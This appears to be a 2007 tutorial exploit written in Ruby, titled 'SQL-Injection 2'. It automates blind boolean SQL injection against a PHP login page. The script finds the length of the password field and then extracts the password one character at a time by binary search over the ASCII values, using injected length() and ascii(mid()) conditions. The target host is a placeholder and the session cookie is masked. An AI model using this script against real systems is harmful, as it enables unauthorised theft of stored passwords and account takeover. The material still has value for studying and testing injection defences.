[Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"

# Author      : mashimaro
# Last Modify : 2007/12/11

require 'net/http'
require 'net/https'

host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'

http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
 'Cookie' => cookie,
#  'Referer' => 'http://profil.wp.pl/login.html',
#  'Content-Type' => 'application/x-www-form-urlencoded'
}

cmd = 'password';
appear_str = 'Steven Baker';

len = 0;

if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. 判斷回傳長度
while(1)
 resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'', 

headers)
 break if(!data.index(appear_str));
 print 8.chr * len.to_s.length;
 len = len + 1;
 print len.to_s;
end
end


puts '';
i = 1;
print 'str = ';

# Step 2. 找出字串
while(i <= len)  print 80.chr;  resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'', 

headers);
if(data.index(appear_str))
 min = 80;
 max = 127;
else
 min = 32;
 max = 79;
end

while(min != max)
 mid = ((min + max + 1) / 2).to_i;
 print 8.chr;
 print mid.chr;
 str = '  [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
 print str;
 resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +

mid.to_s + '--\'',  headers);
 if(data.index(appear_str))
   min = mid;
 else
  max = mid - 1;
end
 if(min > max)
  puts 'error: min > max';
  exit(0);
 end
 print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end

print 8.chr + min.chr;

i = i + 1;
end

puts "\r\n\r\n" + 'sql brute force search done!!';